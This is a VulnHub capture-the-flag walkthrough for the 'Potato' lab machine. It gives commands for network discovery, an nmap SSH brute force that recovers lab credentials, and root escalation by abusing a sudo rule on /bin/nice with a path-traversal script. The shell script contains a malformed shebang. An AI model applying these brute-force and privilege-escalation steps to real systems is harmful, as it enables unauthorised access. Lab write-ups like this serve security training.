VulnHub

VulnHub Walkthrough: πŸ₯” Potato

Part 1

  1. Find Target: netdiscover -r <Kali IP>

  2. Scan the target network:
    • nmap -A -p0-65535 <IP>
    • Open ports: SSH, TCP, FTP
  3. Brute-force SSH using nmap script
    • nmap -vv -script=ssh-brute.nse -p 22 <IP> * -vv: Increased verbosity
    • -script: nmap script
    • -p: target port
    • Found Credentials - username: webadmin password: dragon
  4. Login to SSH using found credentials
    • ssh webadmin@<target ip> -p 22 –> password: dragon

  5. Next use ls to reveal users.txt: ls -halt

  6. Run sudo -l to see what permissions the user has.

Part 2

  1. Discover that the webadmin can use ==> /bin/nice & /notes/*

  2. So /bin/nice can be used to execute, then files in the /notes/* can be executed
    • Knowing this, we create a simple script, root.sh, that will deploy a bash shell: 
      #/bin/bash
bash -e
  3. We can use the following command to deploy the script:
    • sudo /bin/nice /notes/../home/webadmin/root.sh (you may need to chmod +x root.sh beforehand.
  4. You’re in. cat /root/root.txt
This site is open source. Improve this page.